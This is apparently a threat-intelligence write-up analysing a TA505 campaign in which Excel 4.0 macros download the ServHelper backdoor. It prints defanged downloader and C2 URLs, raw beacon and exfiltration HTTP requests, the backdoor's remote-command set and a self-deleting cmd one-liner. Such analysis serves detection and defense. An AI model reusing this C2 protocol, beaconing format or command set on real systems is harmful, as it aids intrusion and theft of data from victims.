MD5 — b0ecd639d4f4b3f1080c26abfa978681
While investigating the final payload (ServHelper), I found the TA505 unregistered/unused domains for future usage, the domains are still available to register, so we may expect next wave with these domains.
TA505’s unregistered/unused domains:
dsfk3322442fr44446g[.]icu — used as C2 but not registered
gdskjkkkss[.]pw — unused
Analysis:
Stage 1: Macros execute and downloads MSI installer file which contains ServHelper backdoor.
Downloader: hxxp://169.239.129[.]61/k1 → rdy.exe
MD5: 2737455bff260fdc22216c3d1185d814
SHA256: FCFAA5A008448BE96B273CA3D59E28D4A0B20156909DA676520DC5103D15AD77
During Execution, The Excel 4.0 Macros executes the macro script, The downloader URL is embedded in \_VBA_PROJECT_CUR\Form17\f.
Request:
GET /k1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 169.239.129[.]61
Connection: keep-alive
Stage 2: rdy.exe extracts ServHelper backdoor, which is a DLL file“dxdiag.dll”
dxdiag.dll: ServHelper backdoor
MD5: 9c6ac05f579778bf0ea33452e12d1e42
SHA256: AD377333D9D2D6620FCB6B63B4C48BF70202776E1E9BB38A8577434937C08E73
The first stage downloader ‘rdy.exe’ is a MSI installer package which will installs ServHelper backdoor “dxdiag.dll”.
The files are digitally signed
Stage 3: Once the backdoor installs, it will collect machine workgroup information and do POST request to C2.
C2 : hxxp://medastr[.]com/docs/s.php
POST /docs/s.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Content-Length: 137
Host: medastr[.]com
Connection: keep-alive
key=document&sysid=jun23Windows+7+Service+Pack+1+%28Version+6.1%2C+Build+7601%2C+64-bit+Edition%29_Jones%3A50496&resp=knock&misc=&rights=
The C2 responds to execute “net group /domain” in cmd.exe
Response:
shell^net group /domain
Then the machine will send a POST request with results returned for the command.
2nd Request body from non-workgroup machine
key=document&sysid=jun23Windows+7+Service+Pack+1+%28Version+6.1%2C+Build+7601%2C+64-bit+Edition%29_USER%3A50496&resp=The+request+will+be+processed+at+a+domain+controller+for+domain+WORKGROUP.%0D%0A%0D%0ASystem+error+1355+has+occurred.%0D%0A%0D%0AThe+specified+domain+either+does+not+exist+or+could+not+be+contacted.%0D%0A%0D%0A&misc=&rights=
2nd Request body from domain workgroup machine
POST hxxp://medastr[.]com/docs/s.php HTTP/1.1
Proxy-Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Content-Length: 1242
Host: medastr[.]com
key=document&sysid=jun23Windows+10+%28Version+10.0%2C+Build+17763%2C+64-bit+Edition%29_client2%3A92113&resp=The+request+will+be+processed+at+a+domain+controller+for+domain+[Redacted domain information]
Based on the interest of the victim, the attacker will give additional commands.
Backdoor Analysis:
The backdoor was packed with PECompact, the unpacked file is a Delphi compiled payload.
The backdoor is a ServHelper variant, which connects to C2 medastr[.]com
Once the backdoor ran, it will do a consequent step to gather information from machine and POST back to C2.
Some of the observations:
- Reconnaissance: PowerShell script.
During investigation, I found the final payload executes PowerShell script to gather machine and user information, it will do a recon on the infected machine and checks for the user whether he is an admin or not, if it founds the user is admin, it will send the details to C2.
2. Persistence: Run key
3. Commands from C2: Commands gathered from the payload, which will be executed by the adversary.
enum
shell — Executes commands in cmd
persist
slp_ok — sleep
addll — installs additional malware
selfkill — self destruction
/c ping localhost -n 10 > nul & del
4. C2: Unregistered/unused C2’s
During Reverse engineering the final payload (ServHelper), I found the TA505 unregistered/unused domains for future usage, the domains are still available to register, so we may expect next wave with these domains.
5. Decentralized domain names:
Adversary using the decentralized domain names as C2, where you cannot find the whois information from ICANN list as well as not approved by ICANN.
These domains are sold by blockchain technology where adversary buys with bitcoins and covering the traces, these domains are hard to trace by the authorities.
As, we can see the 2 new domains are planned to register with “icu” and “pw” tld’s and these are still available to buy.
Communication to unregistered C2:
Command analysis:
I replayed the command to the infected machine to check for the behavior, and found that it is executing but.ps1 to enumerate the machine and responds accordingly, mainly they are looking for Domain machines which clearly shows their attack platform and target, Financial organisations are their target.
Output of but.ps1:
USER-PC is not part of a domain.
is part of admin group
admin(high integrity): False
WARNING: column “CurrentLocation” does not fit into the display and was removed
.
Name Used (GB) Free (GB) Provider Root
— — — — — — — — — — — — — — — — — —
C 38.10 51.80 FileSystem C:\
D FileSystem D:\
